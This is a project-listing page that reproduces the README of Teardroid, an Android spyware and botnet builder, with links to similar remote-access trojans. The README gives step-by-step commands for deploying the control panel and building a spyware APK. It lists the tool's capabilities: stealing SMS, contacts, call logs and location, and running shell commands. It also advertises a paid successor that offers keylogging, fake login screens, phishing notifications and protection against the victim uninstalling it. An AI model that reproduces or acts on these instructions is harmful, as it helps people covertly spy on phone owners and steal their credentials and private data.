All Projects โ†’ ScRiPt1337 โ†’ Teardroid-phprat

ScRiPt1337 / Teardroid-phprat

Licence: MIT license
๐Ÿ‡ฎ๐Ÿ‡ณ ๐Ÿค– It's easy to use android botnet work without port forwarding, vps and android studio

Programming Languages

Smali
51 projects

Projects that are alternatives of or similar to Teardroid-phprat

Paradoxiarat
ParadoxiaRat : Native Windows Remote access Tool.
Stars: โœญ 395 (-5.28%)
Mutual labels:  botnet, rat, keylogger, hacking-tool
paradoxiaRAT
ParadoxiaRat : Native Windows Remote access Tool.
Stars: โœญ 583 (+39.81%)
Mutual labels:  botnet, rat, keylogger, hacking-tool
AdbNet
A tool that allows you to search for vulnerable android devices across the world and exploit them.
Stars: โœญ 112 (-73.14%)
Mutual labels:  post-exploitation, hacking-tool, android-rat
Proton
Proton Framework is a Windows post-exploitation framework similar to other Windows post-exploitation frameworks. The major difference is that the Proton Framework does most of its operations using Windows Script Host, with compatibility in the core to support a default installation of Windows 2000 with no service packs all the way through Windows 10.
Stars: โœญ 142 (-65.95%)
Mutual labels:  rat, post-exploitation, hacking-tool
Emp3r0r
linux post-exploitation framework made by linux user
Stars: โœญ 419 (+0.48%)
Mutual labels:  rat, post-exploitation, hacking-tool
Ghost
Ghost Framework is an Android post-exploitation framework that exploits the Android Debug Bridge to remotely access an Android device.
Stars: โœญ 1,934 (+363.79%)
Mutual labels:  rat, post-exploitation, android-rat
Torat
ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication
Stars: โœญ 415 (-0.48%)
Mutual labels:  rat, keylogger, post-exploitation
Skyrat
SkyRAT - Powershell Remote Administration Tool
Stars: โœญ 21 (-94.96%)
Mutual labels:  rat, keylogger, hacking-tool
Malware
Rootkits | Backdoors | Sniffers | Virus | Ransomware | Steganography | Cryptography | Shellcodes | Webshells | Keylogger | Botnets | Worms | Other Network Tools
Stars: โœญ 156 (-62.59%)
Mutual labels:  botnet, keylogger
Technowhorse
TechNowHorse is a RAT (Remote Administrator Trojan) Generator for Windows/Linux systems written in Python 3.
Stars: โœญ 189 (-54.68%)
Mutual labels:  rat, hacking-tool
XENA
XENA is the managed remote administration platform for botnet creation & development powered by blockchain and machine learning. Aiming to provide an ecosystem which serves the bot herders. Favoring secrecy and resiliency over performance. It's micro-service oriented allowing for specialization and lower footprint. Join the community of the ultiโ€ฆ
Stars: โœญ 127 (-69.54%)
Mutual labels:  botnet, post-exploitation
Poet
[unmaintained] Post-exploitation tool
Stars: โœญ 184 (-55.88%)
Mutual labels:  rat, post-exploitation
Stitch
Python Remote Administration Tool (RAT)
Stars: โœญ 2,018 (+383.93%)
Mutual labels:  rat, keylogger
Botnet
Remote Access Tool, Command & Control, based on the github project Ares, but written in python 3 with some extra features.
Stars: โœญ 26 (-93.76%)
Mutual labels:  botnet, hacking-tool
Brutus
Botnet targeting Windows machines written entirely in Python & open source security project.
Stars: โœญ 37 (-91.13%)
Mutual labels:  botnet, hacking-tool
Evilosx
An evil RAT (Remote Administration Tool) for macOS / OS X.
Stars: โœญ 1,826 (+337.89%)
Mutual labels:  rat, post-exploitation
Javascript-Botnet-C-Sharp
This is a plugin for the c# R.A.T Server providing extension to javascript based browser botnets
Stars: โœญ 22 (-94.72%)
Mutual labels:  botnet, rat
Blacknet
Free advanced and modern Windows botnet with a nice and secure PHP panel.
Stars: โœญ 271 (-35.01%)
Mutual labels:  botnet, rat
Gobot2
Second Version of The GoBot Botnet, But more advanced.
Stars: โœญ 431 (+3.36%)
Mutual labels:  botnet, keylogger
Brutus
A Python-powered exploitation framework and botnet.
Stars: โœญ 17 (-95.92%)
Mutual labels:  botnet, hacking-tool

โš ๏ธDisclaimer : This software is meant for educational purposes only. I'm not responsible for any malicious use of the app.

๐Ÿค– Teardroid v4

Screenshot

๐Ÿ‡ฎ๐Ÿ‡ณ It's easy to use android botnet work without port forwarding, vps and android studio

GitHub issues Twitter Hacksec

๐Ÿš€ Features

  • Retrieve Contact
  • Retrieve SMS
  • Retrieve running Services
  • Retrieve Device Location (๐Ÿ˜Ÿ Only work when the app is open on newer devices)
  • Retrieve Call Logs
  • Run Shell Command ( use findphno command in run shell command to get device phone number and use findx:pdf to find all the pdf files on the device )
  • Change Wallpaper
  • Send SMS
  • Make Call
  • Get Installed Apps
  • Download File
  • Read Notification
  • Auto-Start
  • Add webview in homepage
  • Ignore Battery Optimisation
  • Get device admin permission

โš ๏ธ Requirement

  • Python3
  • Java
  • Linux or Windows os (we don't support termux use gcloud)
  • For android mobile users use github Codespaces

Java version i used

$ java -version
openjdk version "11.0.13" 2021-10-19
OpenJDK Runtime Environment (build 11.0.13+8)
OpenJDK 64-Bit Server VM (build 11.0.13+8, mixed mode)

Tested on

  • Windows 11
  • Windows 10
  • Manjaro
  • Kali linux
  • Ubuntu

Run control panel on your own server

$ git clone https://github.com/ScRiPt1337/Teardroidv4_api
  • Install uvicorn
$ sudo apt-get install uvicorn
$ python3 -m pip install uvicorn
  • Change dir to Teardroidv4_api
$ cd Teardroidv4_api
  • Install all dependency
$ pip install -r requirements.txt
  • change project key to connect with database
  • Set up an account at deta.sh and go to project keys and create a new key and copy it
$ nano ./db/database.py
from deta import Deta
from os import getenv

deta = Deta(getenv("DETA_PROJECT_KEY")) => deta =  Deta("demo project key")
# replace getenv("DETA_PROJECT_KEY") with your deta.sh project key
# make sure your remove getenv
  • open config.py and change the value of "hello" to any user_agent or text you want
  • Run teardroid api
$ screen
# press enter to go inside the screen session
$ uvicorn main:app --host 0.0.0.0 --port 80
# now close your terminal windows  and we are good to go
  • Change your user-agent of the browser with the value of USER_AGENT you have enter in config.py
  • you can use this chrome extension to change user useragent extension
  • Done

IMPORTANT NOTICE

  • you will not be able to access the dashboard if you dont change your user-agent with the same value of USER_AGENT inside config.py file.
  • its to make you the dashboard more secure and to protect it from geting auto deleted from deta.sh

How to setup

  • Clone Teardroid-phprat repo with the following command.
$ git clone https://github.com/ScRiPt1337/Teardroid-phprat
  • cd in the Teardroid-phprat directory, then type the command below to install all dependencies
$ pip install -r requirements.txt
  • Run the following command to see the options that we can use with the builder.
$ python Teardroid.py
[+] Checking Python Version
[+] Python Version : 3.10 โœ“
  ______                    __           _     __         __ __
 /_  __/__  ____ __________/ /________  (_)___/ /  _   __/ // /
  / / / _ \/ __ `/ ___/ __  / ___/ __ \/ / __  /  | | / / // /_
 / / /  __/ /_/ / /  / /_/ / /  / /_/ / / /_/ /   | |/ /__  __/
/_/  \___/\__,_/_/   \__,_/_/   \____/_/\__,_/    |___/  /_/


Teardroid v4.0 - A tool to build teardroid spyware for Android devices. ๐Ÿ•ท
Contact us : https://t.me/script1337 ๐Ÿš€
usage: Teardroid.py [-h] [-v] [-b]

options:
  -h, --help     show this help message and exit
  -v, --version  Version of Teardroid ๐Ÿฅด
  -b , --build   Build Teardroid with custom name [ex: Teardroid.py -b teardroid] ๐Ÿ˜ท
  • To create an apk execute the following command.
$ python Teardroid.py -b your_app_name
  • It will prompt you with your Control Panel url enter your deta micro URL (without / at the end of the url).

  • You will also be prompted for the title and text of the notification. Enter what you want to display on the notification.

  • DONE

  • Build using codespace

Dashboard

  • visit : https://{your server url}/v4/overview
  • defualt username/password is : admin/admin

Screenshot

  • Builder

  • Overview

  • TaskManager

Setup Video

is teardroid a dead project

  • not yet but if you want this project not to die then please contribute if i get contribution then i will start updating it again

Need something more advanced try ( scatter alfa )

"Logo"

REAL TIME COMMUNICATION BETWEEN BECON AND SERVER
SUPPORT ALL THE LATEST VERSION OF ANDROID
STEALTHY, RESILIENT AND COST-EFFECTIVE
SAND-BOX AND EMULATOR DETECTION
ADVANCED ATTACK TECHNIQUES
UNKILLABLE AND UNINSTALLABLE
INBUILT GEO FENCING
EASY TO OPERATE
STABLE BECON
VNC
O NETWORK TRAFFIC IN IDLE MODE

Dashboard

"scatter"

"dashboard"

Special features

  • Forground service bypass scatter does not show any notification while running in background.
  • Auto launch bypass even in Chinese phone like redmi oppo vivo without auto launch permission.
  • Does not create network logs and does not make http request in idle mode..
  • Android battery optimization bypass without any permission.

Features

  • Keylogger ( capture everything client type on there keyboard )
  • logs (log everything user click on)
  • notification capture ( capture all the notification client recive )
  • run ussd code ( run ussd code for call forwarding etc )
  • fake notification attack ( send phishing link using fake notification that look like is from facebook, microsoft etc )
  • injection ( add injection dynamically according to the installed apps on the client device )
  • popup fake login screen ( popup any page on clients home page without url bar or title bar (so the client will think its from google or any other app))
  • geo fencing
  • dump sms, calls, contacts, installed apps
  • download file
  • shell command
  • open url ( open any url on browser )
  • open apps ( open any app on client device using there package name )
  • auto allow permission ( automatically grant all the run time permission )
  • uninstall protection (stop the victim from uninstalling the app or force stop the app)
  • vnc
  • take screenshot
  • automatically take screenshot when user open any specific app ( example: if you set it to whatsapp it will take screenshot of the client's whatsapp whenever client will open whatsapp and click anything like opening convo or clicking on the send button )
  • block number ( you can block number from victim device so the number can't call the victim )
  • install any apk file in victim device
  • uninstall any app from victim device
  • wake up device and able to run for 1 to 3 hour with screen off
  • hidden app icon (work on new android versions too tested on 9 to 13)

Interested in scatter alfa

Beware from scam

  • for paid project contact me on telegram
  • I am only available on telegram and script1337 is my only account please double check the username

Contact info

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].